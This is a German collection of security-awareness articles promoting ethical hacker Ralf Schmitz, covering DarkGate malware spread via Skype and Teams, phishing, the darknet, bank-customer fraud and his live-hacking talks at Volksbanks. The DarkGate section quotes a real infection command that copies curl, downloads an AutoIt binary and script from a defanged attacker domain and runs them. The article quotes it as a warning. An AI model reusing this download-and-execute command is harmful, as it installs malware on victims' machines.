Eine besonders tückische Malware mit dem Namen „DarkGate“ wird derzeit über Skype- und Teams-Konten übertragen. Hacker verteilen Malware über Microsoft Teams und Skype.

Zur Zeit läuft aktuell eine Hacker-Kampagne, bei der Cyberkriminelle Microsofts Kommunikationsplattformen Skype und Teams missbrauchen, um die Malware

zu verteilen, so der Ethical- Hacker Ralf Schmitz.

 Wie die Angriffe ablaufen und wie Sie sich schützen können erklärt  Ralf Schmitz.

Die Hacker nutzen kompromittierte Skype-Konten, um Nachrichten mit VBA-Loader-Skript-Anhängen zu verschicken, die sich als PDF-Dokument ausgeben.

Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich. 

Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.

Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz. 

So verbreitet sich diese Malware

Diesmal heißt die Malware  „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.

Hacker verteilen Malware über Microsoft Teams und Skype

Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.

C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3  

um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.

Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma. 

Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig. 

Ein großes Datenleck könnte dahinterstecken!

Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.

Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.

Sicherheitstipp von Ethical-Hacker Ralf Schmitz!

Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.

Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.  

Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.

Wenn  Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.

So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.

Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.

Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.

Es gibt ein paar Wahrheiten über Phishing-Mails: Erstens nerven sie, zweitens werden sie immer ausgefeilter, drittens sind sie eigentlich leicht als Betrugsversuche zu identifizieren. Und zuletzt: Darauf hereinfallen tun immer nur die anderen. Phishing-Mails und die neusten Tricks „Das würde mir doch nie passieren.“

Trotzdem wurde bereits die IT der Uni-Klinik in Düsseldorf komplett zum Stillstand gebracht. Operationen musste abgesagt werden, die Notaufnahme wurde überlastet. Hacker übernahmen sogar die Rechner der Kommunalverwaltung Anhalt-Bitterfeld. Es dauerte acht Monate, bis der Notbetrieb wieder aufgehoben werden konnte. Nur weil irgendjemand so einen blöden Link in einer E-Mail angeklickt hatte.

Was bewegt überhaupt Menschen, auf die Links in solchen Mails zu klicken, obwohl sie es besser wissen müssten? Liegt es an mangelndem Problembewusstsein der Mitarbeiterinnen und Mitarbeiter? An Langeweile? Ein Forscherteam der Friedrich-Alexander-Universität Erlangen ging dieser Frage nach und kam zu der Erkenntnis, dass der Hauptgrund schlichte Neugier ist, gepaart mit einem Inhalt, der einen Bezug zum Empfänger hat. Es ist also mehr ein psychologisches als ein technisches Phänomen.

Phishing-Mails und die neusten Tricks…

In dem zugrundeliegenden Experiment schickten die Wissenschaftler kurz nach Neujahr eine Mail an 1.200 Studentinnen und Studenten. Der Inhalt war ganz unverdächtig und lautete, die Silvesterparty sei toll gewesen und hier seien die Bilder davon. Zusammen mit dem Hinweis, man solle die Bilder niemandem zeigen, der nicht dabei war.

Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden.

Die Ergebnisse ließen IT-Verantwortliche blass und Marketing-Spezialisten grün vor Neid werden. Die Klickrate betrug stolze 25 Prozent. Also hatten ein Viertel der Adressaten den Link in der E-Mail angeklickt, obwohl die Fete nie stattgefunden hatte. Selbstredend, dass die Wissenschaftlerinnen und Wissenschaftler keinen Schaden anrichteten und lediglich verzeichneten, wer reingefallen war.

Hacker Ralf Schmitz berichtet….

Als man die Versuchspersonen später nach den Gründen für den Klick befragte, sagten 34 Prozent, sie seien einfach neugierig auf die Fotos gewesen, 27 Prozent nannten den passenden Zeitpunkt kurz nach Silvester und 16 Prozent meinten, die Absender-Adresse zu kennen. Diese Zahlen belegen nur den Eindruck, den Sicherheitsverantwortliche in den letzten Jahren gewinnen konnten: Gerade die Aussicht auf Bilder ließ die Angesprochenen auf Links klicken. Und je besser der Text in die gegenwärtige Situation des Empfängers passt, desto wahrscheinlicher ist die Aktion erfolgreich.

Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert.

Die Erfolge der Cyber-Kriminellen sind fast schon vorprogrammiert. Sie feilen nur noch am Kontext immer genauer. Mit ein wenig Recherche in Sozialen Medien, Facebook bietet sich da an, noch besser sind aber LinkedIn und Xing, ist es kein großer Aufwand, eine Mail auf den Empfänger maßzuschneidern. Wenn nämlich persönliche oder berufliche Details in der E-Mail auftauchen, Firmennamen oder Jobwechsel, lassen diese den Inhalt umso glaubhafter erscheinen. Selbst hier könnte Künstliche Intelligenz helfen, den Betrügern in Zukunft viel Handarbeit zu ersparen.

Die Leiterin der zuvor genannten Studie, Frau Dr. Benenson, sagt wohl zu Recht, dass mit sorgfältiger Planung und Ausführung jeder dazu gebracht werden kann, solch einen Link anzuklicken, und sei es nur aus Neugier. Oder aus Angst, weil angedroht wird, Konten zu sperren oder angeblich teure Bestellungen getätigt zu haben.

Die Cyber-Halunken wenden demnach ganz simple psychologische Tricks an, um die Opfer in die Falle zu locken.

Phishing-Mails wenden psychologische Tricks an!

Was also ist die Konsequenz für Unternehmen und Institute daraus? An einer entsprechenden Schulung der Mitarbeiter, in der sie für die Problematik sensibilisiert werden, führt kein Weg vorbei, dies gilt gerade für technisch weniger versierte Angestellte. Für private Nutzerinnen und Nutzer vielleicht dieser Tipp: Wenn es emotional wird, wenn Neugier oder Angst die Kontrolle übernehmen könnten, die Nachricht sofort löschen. Banken, Sparkassen und Online-Händler schicken niemals emotionale Angelhaken.

Noch fragen sie nach Kontodaten oder wollen persönliche Angaben. Doch, so schade es ist, gibt es keinen 100%-igen Schutz vor digitalem Betrug. Doch es hilft schon, sich einfach mit solchen Themen zu beschäftigen. Denn auch hier macht Übung den Meister.

Vor einigen Jahren konnten durchschnittliche Internet-Nutzerinnen und -Nutzer mit dem Begriff noch gar nichts anfangen. Doch inzwischen haben schon viele Leute etwas über das Darknet gehört. Meistens jedoch nicht als gute Nachrichten. Denn das Darknet, im Sinne der Starwars-Filme, steht so etwas für die dunkle Seite der Macht. Genauer: des Internets. Dabei ist die Sache im Grunde recht einfach. Was weiß das Darnet über mich?

Das Darknet ist kein eigenes Netzwerk, oder irgendwie unsichtbar. Es ist einfach ein Teil des Internets, das wir beinahe alle meist täglich nutzen. Doch zwei Aspekte unterscheiden das Darknet vom normalen, offenen Internet. Einmal haben dort die Server, auf die zugegriffen wird, keine der gewöhnlichen Namen wie Amazon-PUNKT-de, oder Spiegel-PUNKT-de. Sondern die Websites haben kryptische, ellenlange Namen, die sich keiner merken könnte. Dazu, hier wird es jetzt wortwörtlich dunkel, sind sie nicht herkömmlichen Suchmaschinen zugänglich. Es handelt sich damit um einen anonymen Bereich, der es den Betreibern des Darknets ermöglicht, ihre Identität zu verbergen und so auf Inhalte zuzugreifen, die im regulären Internet nicht zu finden sind.

Doch noch eine zweite Eigenschaft des Darknets ist wichtig. Die Anonymität im Darknet wird durch den Einsatz von speziellen Verschlüsselungstechniken und Anonymisierungsdiensten wie dem Tor-Netzwerk erreicht. Diese Technologien ermöglichen es den Nutzerinnen und Nutzern, ihre tatsächliche so genannte IP-Adresse zu verbergen. Dazu werden die Daten über mehrere Server geleitet, um ihre Identität zu verschleiern. Zwar könnte im Prinzip jeder auf Informationen im Darknet zugreifen, der Internet-Browser „Brave“ hat sogar den Zugang zum Darknet von Haus aus eingebaut. Doch man muss ja erst einmal die komplizierte Adresse im Darknet wissen. Zum Beispiel von einem ominösen Drogen-Händler. Oder eben auch nicht. Dazu gleich mehr.

Was weiß das Darnet über mich?

Allgemein bekannt ist inzwischen, dass im Darknet Informationen und Dienstleistungen angeboten werden, die oft illegal oder zumindest kontrovers sind. Dazu gehören beispielsweise der Handel mit Drogen, Waffen, gestohlenen Daten und gefälschten Dokumenten, Pornografie oder Kreditkartennummern samt PIN.

Es werden auch Bankdaten von Kunden dort gehandelt und es gibt Listen von Finanzinstitute die in nächster Zeit angegriffen werden sollen. So werden dort Sparkassen oder auch Voksbanken genannt.

Es gibt auch Foren und Marktplätze, auf denen illegale Aktivitäten diskutiert und durchgeführt werden. So zu sagen eBay für Verbrecher. Man kann sogar Angriffe auf Server dort bestellen, meistens bei russischen oder nordkoreanischen Hackern, mit anonymen digitalen Zahlungsmitteln. Es können aber auch Morde in Auftrag gegeben werden und die werden mit Bitcoin bezahlt. Leider sind aber auch dort viele persönliche Informationen über einen User zu finden und sogar Kreditkartendaten mit Pins.

Das Darknet wird eben nicht ausschließlich für illegale Aktivitäten genutzt.
Schätzungen, wie viel vom Darknet gesetzeswidrigen Aktivitäten dient, liegen
bei 25 bis 30%.

Es gibt nämlich auch legitime Gründe, warum Menschen das
Darknet nutzen, wie zum Beispiel den Schutz der Privatsphäre in Ländern mit
eingeschränkter Meinungsfreiheit oder den Zugriff auf zensierte Informationen. Journalistinnen und Journalisten kommunizieren über das Darknet aus Ländern wie Russland oder Irak ungefährdet mit ihren Redaktionen zuhause.

Whistleblower geben vertrauliche Informationen aus Unternehmen oder Regierungsstellen an Medien weiter. Weder ist das Darknet nur schwarz, noch das Alltags-Internet nur weiß.

Dennoch ist es wichtig zu betonen, dass die Nutzung des Darknets mit
erheblichen Risiken verbunden ist. Die Anonymität kann dazu führen, dass sich
Kriminelle und Betrüger im Darknet verstecken, was zu finanziellen Verlusten
oder rechtlichen Konsequenzen für die Nutzer führen kann. Es ist daher
ratsam, falls Sie doch einmal neugierig sind, das Darknet mit äußerster
Vorsicht zu nutzen und sich bewusst zu sein, dass illegale Aktivitäten
strafrechtlich verfolgt werden können. Denn wenn am Ende Dinge aus dem Darknet
in Ihrem Alltag landen, ist es vorbei mit der Anonymität. Dann gelten wieder
die gewohnten Regeln, Gesetze und moralisch-ethischen Grenzen. Willkommen auf
der hellen Seite des Internets.

In den letzten Monaten hat die Bedrohung durch Phishing-Angriffe auf Bankkunden bedenklich zugenommen, sagt Hacker Ralf Schmitz . Diese Angriffe haben das Ziel, sensible Kontodaten zu stehlen und finanziellen Schaden anzurichten. Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen.

Angreifer nutzen dabei immer raffiniertere Methoden, um ihre Opfer zu täuschen. Ein aktueller Bericht von ZDF WISO beleuchtet diese wachsende Gefahr und bietet wichtige Einblicke für Verbraucher.

Gestohlene Bankdaten durch Phishing

WISO crime: Virtuellen Bankräubern auf der Spur

Der Bericht „Phishing: Gestohlene Kontodaten“ von ZDF WISO https://www.zdf.de/verbraucher/wiso/phishing-gestohlene-kontodaten-100.html hebt hervor, wie Hacker vorgehen, um an unsere vertraulichen Informationen zu gelangen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Diese Angreifer geben sich oft als legitime Institutionen aus, wie Banken oder Regierungsbehörden, und täuschen die Opfer mit gefälschten E-Mails, SMS oder Telefonanrufen. In vielen Fällen werden die Empfänger dazu gedrängt, persönliche Daten preiszugeben oder auf gefährliche Links zu klicken, so Ralf Schmitz.

Solche betrügerischen Aktivitäten können verheerende Folgen für Bankkunden haben. Finanzielle Verluste, Identitätsdiebstahl und der Missbrauch sensibler Informationen sind nur einige der möglichen Konsequenzen. Daher klärt Ralf Schmitz in seinen Hacker-Vorträge Mitarbeiter und Kunden von Kreditinstituten auf, wie man sich richtig schützen kann, denn die Gefahren haben zugenommen.

Es ist von größter Bedeutung, dass Verbraucher sich dieser Gefahr bewusst werden und geeignete Schutzmaßnahmen ergreifen.

Zunahme von Phishing-Angriffen auf Bankkunden und Schutzmaßnahmen

Sicherheitsexperten wie Ralf Schmitz empfehlen, stets misstrauisch gegenüber unerwarteten Nachrichten oder Anfragen zu sein, die persönliche oder finanzielle Informationen erfordern. Vor der Weitergabe von Daten sollte die Echtheit der Anfrage unbedingt überprüft werden, zum Beispiel durch den direkten Kontakt mit der Institution.

Des Weiteren ist es ratsam, starke und einzigartige Passwörter zu verwenden und regelmäßig zu ändern.

Zusätzlich können Sicherheitssoftware und Antivirenprogramme dazu beitragen, Phishing-Angriffe zu erkennen und abzuwehren. Eine umfassende Aufklärung über die Methoden der Angreifer ist der erste Schritt, um sich wirksam vor diesen Bedrohungen zu schützen.

Der Bericht von ZDF WISO unterstreicht die Notwendigkeit einer verstärkten Sensibilisierung der Öffentlichkeit für die Gefahren von Phishing-Angriffen. Es ist von entscheidender Bedeutung, dass Verbraucher informiert und aufgeklärt sind, um ihre persönlichen und finanziellen Informationen zu schützen.

Ein verantwortungsbewusster Umgang mit digitalen Kommunikationsmitteln und ein erhöhtes Bewusstsein für potenzielle Bedrohungen sind von größter Wichtigkeit, um der wachsenden Bedrohung von Phishing-Angriffen wirksam entgegenzuwirken.

Im Rahmen ihrer jährlichen Vertreterversammlung begrüßt die Volksbank eG,Syke ihre Mitglieder, Kundinnen und Kunden in der historischen Gutsscheune des Gut Varrel in Stuhr.“Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke.

Den über 200 Teilnehmenden wird neben der offiziellen Vertreterversammlung und der Vorstellung des Schulbildungsförderungsprojektes VR-DIGICATION ein 45-minütiger Impulsvortrag über aktuelle Methoden von Cyberkriminalität präsentiert.

Live-Hacking“ bei der diesjährigen Vertreterversammlung der Volksbank eG, Syke 

Sicherheitsexperte und Ethical-Hacker Ralf Schmitz kombiniert langjährige Erfahrung im Sicherheitsbereich mit Humor sowie Fachkompetenz mit interaktiven Einlagen zum Internetschutz bei Bankgeschäften. Das Publikum erhält hiermit fundierte Informationen sowie praxisrelevante Sicherheitstipps.

Sicherheitsexperte Ralf Schmitz (sicher-stark.com)

„Cyberangriffe auf Finanzinstitute nehmen rasant zu“, so der Fachmann für Computer-Sicherheit

Laut dem Bundeslagebild Cybercrime 2021 des Bundeskriminalamtes wies die Polizeiliche Kriminalstatistik (PKS) 146.363 gemeldete Fälle von Cyber-Straftaten auf, was einen Anstieg von Cyber-Kriminalität um mehr als 12 % im Vergleich zum Vorjahr bedeutet und einem neuen Höchststand entspricht.

Dunkelziffer ist sehr groß

Gründe dafür sind u. a. die nationale/internationale Handels-Globalisierung, maximierte Digitalisierung, aber auch die Corona-Pandemie und der russische Angriffskrieg gegen die Ukraine. Der Aufklärungsquote von 29,3 % stehen verbreitete Anonymität im World Wide Web sowie vermehrte Aktionen der Täter aus dem Ausland und eine sehr große Dunkelziffer gegenüber.

Bundeskriminalamt warnt

„Letztendlich kann die Bekämpfung von Cybercrime nur gemeinsam gelingen: im Dreiklang von gefahrenabwehrenden und repressiven Maßnahmen, präventiven IT-Sicherheitsvorkehrungen und einer ausreichenden Sensibilisierung von Bürgern und Unternehmen hinsichtlich der Gefahren bzw. Eintrittsvektoren durch Cybercrime“, so Martina Link, BKA-Vizepräsidentin.

Bankensektor besonders betroffen

Speziell der Bankensektor ist durch Cybercrime gefährdet und erfolgreiche Hackerangriffe sind in dieser Branche besonders brisant. Dabei entsteht nicht nur ein nicht zu kalkulierender monetärer Schaden durch Datendiebstahl/ –verlust und Schadenersatzansprüche, sondern auch eine langanhaltende Imageschädigung sowie Vertrauensverlust des Kunden gegenüber seinem Finanzinstitut, die die zukünftige Zusammenarbeit belasten oder sogar beenden kann.

Aufklärung als präventive Maßnahme

Der IT-Sicherheits-Vortrag zur Aufklärung, Schulung und Sensibilisierung von Ralf Schmitz ist ein weiterer Schritt zur Sicherheit und dient als zusätzliche Maßnahme, das Sicherheitsbewusstsein der Teilnehmenden dafür zu schärfen. Deshalb stellt der Experte u. a. aktuelle Hackertools vor und wie sich Privatpersonen und Finanzinstitute davor schützen können. Darüber hinaus präsentiert er aktuelle Fallbeispiele aus der Bankenpraxis sowie viele Tricks und Abkürzungen im Internet.

Auszüge eines Live-Auftrittes von Ethical-Hacker Ralf Schmitz bei einer Vertreterversammlung einer Volksbank

– Von den Vorbereitungen bis zum Live-Auftritt von Ralf Schmitz –

Erst im Juni 2023 präsentierte Ralf Schmitz wieder bei einigen Vertreterversammlungen von Volksbanken Hackertricks und wie Bankkunden sich davor schützen können.

In einer Bilderreihe können Sie einen kurzen Einblick gewinnen über die Abläufe seines Impulsvortrages.

Die Vorbereitung der Veranstaltung für 350 Gäste!

Ralf Schmitz stellt dem Publikum die Hackertricks vor.

Der Beginn und Auftritt von Hacker Ralf Schmitz.

Die Themen werden vorgestellt.

Spoofing Anrufe liegen voll im Trend.

Ralf Schmitz beim Hacking von Bankenseiten.

Die heiße Phase mit Live Angriffen.

Vertreterversammlung bei einer Volksbank

Jeder Platz wurde besetzt.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung.

Die Vorbereitung für das Buffet vor dem Event der Vertreterversammlung

Hacker Ralf Schmitz bei der Arbeit.

Volles Haus bei dieser Veranstaltung.

Schauen Sie genau auf Ihren Kontostand!

Kontrollieren Sie die regelmäßigen Kontoauszüge immer auf nicht genehmigte Abbuchungen. Unberechtigte Kontoabbuchungen? Wer hat nicht schon mal unberechtigte Abbuchungen auf dem Konto festgestellt?

Das Landeskriminalamt (LKA) warnt vor neuen Phishing-Wellen im Jahr 2023. Manchmal handele es sich dabei um einmalige, geringfügige Belastungen. Manchmal steigerten sich die Belastungen des Kontos aber auch – etwa von anfänglich 1,95 Euro auf bis zu 70 Euro, so das LKA.

Wer viel im Internet unterwegs ist und einkauft, kann bei seinen Zahlungen und Abbuchungen schnell den Überblick verlieren: Stimmen die abgebuchten Summen? Sind alle Zahlungen auch autorisiert worden? Oder hat jemand unberechtigterweise Geld vom Konto abgebucht?

Ralf Schmitz, Ethical Hacker, erlebt immer wieder Bankkunden in seinen Hackervorträgen, die ihm atemraubende Geschichten erzählen. So hat eine ältere Dame über 20.000 Euro verloren oder ein junges Ehepaar ohne erklärbaren Grund monatlich Abbuchungen von 50 Euro zu verzeichnen.

Sicherheitsexperte Ralf Schmitz gibt in seinen Bankenvorträgen regelmäßig Tipps, was man bei ungenehmigten Kontoabbuchungen tun sollte und wie man sich vor Missbrauch schützen kann. Im Juni wird er wieder bei der Volksbank Hohenlimburg auftreten und die neusten Gefahren vorstellen.

Internetkriminelle werden immer raffinierter

Woher die Internetkriminellen von der älteren Dame ihren Namen und die Bankverbindung hatten, konnte sie nicht nachvollziehen. So geht es vielen Betroffen, weiß Ralf Schmitz zu berichten. Doch dass die Betrüger über Monate hinweg mit diesen gestohlenen Daten nicht nur immer wieder Mobilfunkverträge auf den Namen der alten Damen abschließen konnten, hat sie ziemlich erschreckt.

Die Mobilfunkfirma schickte ihr stets Rechnungen für diese Leistungen und versuchte, die Beträge abzubuchen. Sie ließ das Geld zurückbuchen, nahm die Einzugsermächtigung zurück und brachte die Vorfälle bei der Polizei zur Anzeige.

Leider liegen mittlerweile hunderttausende Anzeigen auf den Bürotischen der Polizei, weiß der Ex-Polizeibeamte Schmitz zu berichten. Eine Aufklärung ist sehr schwierig, da vielen Polizeibeamten die Erfahrung in Sachen Internetbetrug fehlt. Nur spezielle Abteilungen kennen sich damit aus.

Am Ende wechselte die ältere Dame entnervt die Kontoverbindung. Doch noch lange nach dem ersten Vorfall fand sie immer wieder unautorisierte Rechnungen ihres Mobilfunkanbieters im Briefkasten und es gab vergebliche Abbuchungsversuche von ihrem alten, schon längst nicht mehr existierenden Konto.

Fristen müssen eingehalten werden

Doch wie lange man bei seiner Bank Widerspruch gegen eine Abbuchung einlegen kann, hängt von der jeweiligen Art der Abbuchung ab. Handelt es sich um eine „unautorisierte Abbuchung“ – hat also jemand einen Betrag vom Konto abgebucht, ohne dass die Erlaubnis des Kontoinhabers dazu vorlag – kann man innerhalb von 13 Monaten nach dem Abbuchungstag bei der Bank widersprechen. „Wichtig ist trotzdem, dass man die Bank sofort in Kenntnis setzt, sobald man die Abbuchung bemerkt“, erzählt Ralf Schmitz. Bei sogenannten „autorisierten Abbuchungen“ hat der Betroffene hingegen nur acht Wochen Zeit, um bei seiner Bank Widerspruch einzulegen und die betreffende Summe zurückbuchen zu lassen.

Bei Lastschriften muss die Bank prüfen

Generell gilt: Bei Lastschriften muss die Bank prüfen, ob der Abbuchende auch autorisiert ist, die Abbuchung durchzuführen. Gibt es Streit über die Autorisierung, muss die Bank ihre Aufzeichnungen über die Autorisierung vorlegen. „Während die Banken bei Fällen von Bandenkriminalität in der Regel kulant sind, ist es durchaus möglich, dass man sich in Einzelfällen mit der Bank streiten muss“, so der Sicherheitsexperte Schmitz. Eine Möglichkeit, um wiederholte unrechtmäßige Abbuchungen zu verhindern, sind sog. „Black Lists“ (schwarze Listen) oder „White Lists“ (weiße Listen). Auf der „schwarzen Liste“ kann man seiner Bank mitteilen, wer auf keinen Fall Geld vom Konto abbuchen darf. Mit solchen Listen weiß die Bank von vornherein, wer abbuchen darf – und wer nicht.

Skimming-Schäden gehen in die Million

Es kann nicht nur durch Abbuchungen Geld vom Konto verschwinden. Auch durch das sogenannte „Skimming“, bei dem Betrüger Geldautomaten manipulieren und so an die Kartendaten inklusive PIN gelangen, kann ein Missbrauch stattfinden. Im Darknet gibt es die Platten und Software, um die Geräte zu manipulieren, weiß der Sicherheitsexperte Schmitz und zeigt in seinen Vorträgen, wie man sich schützen kann.

Eine weitere Möglichkeit besteht darin, dass Hacker Schadsoftware auf den Rechner oder Mobilgeräte der Bankkunden einschleusen. Diese Software spioniert dann Bankdaten aus. Die Täter erhalten dadurch Zugriff auf das Konto und können dann selbst Überweisungen tätigen. Kleiner Wermutstropfen: Ist der Verlust im Rahmen von Skimming entstanden, kommt in der Regel das Kreditinstitut für den entstandenen Schaden beim Kunden auf.

Trotzdem sollte im Internet jeder sehr vorsichtig agieren und einen siebten Sinn für Betrugsmaschen entwickeln.

„Eine neue Masche ist im Darknet entdeckt worden“, so Ethical-Hacker Ralf Schmitz

Hacker und Cyberkriminelle arbeiten ständig an neuen Tricks, wie sie unbemerkt Malware auf die Handys, Tablets und PCs ihrer Opfer bringen um dort möglichst lange ungestört ihr böses Werk verrichten zu können. Hacker nutzen Künstliche Intelligenz(KI), um Malware unauffindbar zu machen.

Der neueste Trend ist, mit Hilfe von Künstlicher Intelligenz (KI) Schadsoftware auf die mobilen Geräte zu generieren.

Die Hacker nutzen demnach mittlerweile einen großen Umfang Künstlicher Intelligenz, um ihre Malware unauffindbar zu machen und sich so einen Vorteil gegenüber den gängigen Antimalware-Anwendungen zu verschaffen.

Malware durch KI erzeugen!

Die Sicherheitsexperten von Acronis melden in ihrem neuesten Bericht, dass Cyberkriminelle immer häufiger Malware durch Künstliche Intelligenz (KI) auf den Rechner generieren, die sich der Entdeckung durch herkömmliche Antivirenerkennung entzieht.

Hacker nutzen Künstliche Intelligenz(KI), um Malware unauffindbar zu machen
Der Bericht zeigt zudem, dass E-Mail-Angriffe und Ransomware-Fälle im Vergleich zum letzten Jahr zahlenmäßig nahezu explodiert sind. Laut Ethical-Hacker Ralf Schmitz liegt das unter anderem daran, dass auf den einschlägigen Marktplätzen im Darknet zum Beispiel Ransomware immer billiger zum Einsatz angeboten wird.

Es ist also für Cyberkriminelle mit entsprechender Erfahrung günstiger und einfacher an entsprechende Tools zu kommen.

Ungefähr alle 11 Sekunden wird jemand Opfer eines Ransomware-Angriffs

Die Cybercrime-Angriffe werden aber auch zunehmend intelligenter, raffinierter und dadurch schwieriger zu erkennen.

Das Volumen der Bedrohungen ist in diesem Jahr,  im Vergleich zum letzten Jahr, stark angestiegen. Das ist ein Zeichen dafür, dass Kriminelle die Art und Weise, wie sie Systeme kompromittieren und Angriffe ausführen, stetig skalieren und verbessern.

Neue Methoden zur Überwachung sind nötig, warnt Sicherheitsexperte Ralf Schmitz

Um der dynamischen Bedrohungslandschaft zu begegnen, vor allem auf dem Banken- und Versicherungssektor, benötigt die Bankenlandschaft agile, umfassende und einheitliche Sicherheitslösungen, die die nötige Transparenz bieten, um Angriffe zu verstehen, den Kontext zu vereinfachen und effiziente Abhilfemaßnahmen für jede Bedrohung bereitzustellen.

User = größte Sicherheitslücke!

Der Mensch hinter dem Gerät bleibt die größte Schwachstelle, wenn keine Schulungen sowie Aufklärung stattfinden. Die Phishing-Angriffe sind nach wie vor die wichtigste Methode für Hacker an Nutzerdaten zu gelangen.

Allein in der ersten Hälfte des Jahres 2023 ist die Zahl der E-Mail-basierten Phishing-Angriffe – dem Bericht zufolge im Vergleich zum Vorjahr – um 464 Prozent angestiegen.

Cyberkriminelle haben den aufkeimenden KI-Markt mit großen Sprachmodellen (LLM) angezapft und nutzen Plattformen, um neue Angriffe durch aktives Lernen zu erstellen, zu automatisieren, zu skalieren und zu verbessern. Der vollständige Acronis „Mid-Year Cyberthreats Report 2023“ ist auf der Website des Unternehmens erhältlich.

Groß- aber auch Regionalbanken wie Sparkassen und Volksbanken sollten Ihre Ausgaben für Internetsicherheit steigern, denn die Anzahl der Angriffe nehmen weiter zu, so Ethical-Hacker Ralf Schmitz. Cyberangriffe auf Finanzinstitute nehmen rasant zu laut “Hacker“ Ralf Schmitz

Einige Finanzinstitute setzen die Priorität bereits auf Aufklärung und Sicherheit, so wie die Volksbank Hohenlimburg eG, wo Sicherheitsexperte Ralf Schmitz bei der

Vertreterversammlung am 15.06.23 ab 18:00 Uhr

den ungefähr 80 geladenen Kunden der Volksbank Hohenlimburg eG sein Wissen und seine Erfahrung beim „Live-Hacking“ auf der Bühne präsentieren wird. Im Anschluss an den Vortrag zum Thema “Cyberkriminalität mit Bezug auf Banken und deren Kunden“ haben die Teilnehmer noch die Möglichkeit Fragen zu stellen.

Die Methoden der Betrüger werden immer raffinierter und vielfältiger. So wird es zunehmend schwieriger sich vor Spoofing-Anrufen, Phishing und gefälschten E-Mails zu schützen. Ralf Schmitz hat viele Praxis-Beispiele sowie Tipps und Tricks dabei, die er seinem Publikum zeigen wird.

Sicherheitsexperte Ralf Schmitz  (sicher-stark.com)

Einige erfolgreiche Cyberattacken hatten die Branche aufgeschreckt, denn bereits im Juli 2021, legte beispielsweise ein Sabotageangriff auf den IT-Dienstleister der Volks- und Raiffeisenbanken die mehr als 800 genossenschaftlichen Geldhäuser lahm.

Auch aktuell sehen sich die Banken zunehmend mehr Hackerangriffen ausgesetzt. Vor allem in Finanzballungsgebieten, wie Frankfurt am Main, steigen die Zahlen überproportional. So hat u.a. die Commerzbank 2022 ihre Ausgaben zum Schutz vor Cyberattacken wesentlich erhöht.

Sogar die Deutsche Bundesbank wird zunehmend häufig von Hackern attackiert. Die Zahl der Angriffe nimmt ständig zu“, äußerte sich Vorstandsmitglied Joachim Würmerling.

Cyberangriffe auf Finanzinstitute nehmen rasant zu  laut “Hacker“ Ralf Schmitz

„Die Notenbank ist mit allen ihren Daten sowie Einlagen von Privat- und Geschäftskunden weltweit ist bestimmt auch ein attraktives Angriffsziel für Hacker“, so der Sicherheitsexperte Schmitz.

Zusätzlich sind seit dem russischen Angriffskrieg gegen die Ukraine mehr Cyberkriminalitätsfälle aus dem Ausland gemeldet worden.

Ein IT-Sicherheits-Vortrag ist der Einstieg für weitere Maßnahmen, aber auch um aufzuklären und zu schulen. Deshalb wird Ralf Schmitz in seinem Vortrag u.a. die aktuellsten Hackertools vorstellen und wie man sich als Finanzinstitut sowie als Privatperson schützen kann. Außerdem verrät er viele Tipps und Abkürzungen im Internet.

„Erfolgreiche Cyberangriffe bedeuten enormen Reputationsschaden für die Bank“,  sagt der Vorstandsvorsitzende von der Volksbank Hohenlimburg eG Klaus-Martin Kesper

von links: Dennis Fulde und Klaus-Martin Kesper (Vorstand der Volksbank)

